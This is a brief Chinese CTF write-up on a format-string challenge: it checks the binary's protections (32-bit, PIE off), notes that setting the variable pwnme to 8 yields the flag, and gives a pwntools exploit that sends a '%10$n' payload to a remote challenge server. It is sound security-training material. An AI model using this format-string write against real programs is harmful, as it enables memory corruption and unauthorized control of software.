格式化字符串-相关知识点CTFWiki
一、查看开启的保护
只有PIE没有开启,32位
二、逻辑程序分析
可以看到只需要让pwnme的值等于8就拿到了flag
exp如下
from pwn import *
#r = process("./1")
r = remote('220.249.52.133', 50842)
pwnme_addr = 0x0804A068
payload = p32(pwnme_addr) + 'aaaa' + '%10$n'
r.recvuntil("please tell me your name:\n")
r.sendline('BurYiA')
r.recvuntil("leave your message please:\n")
r.sendline(payload)
r.interactive()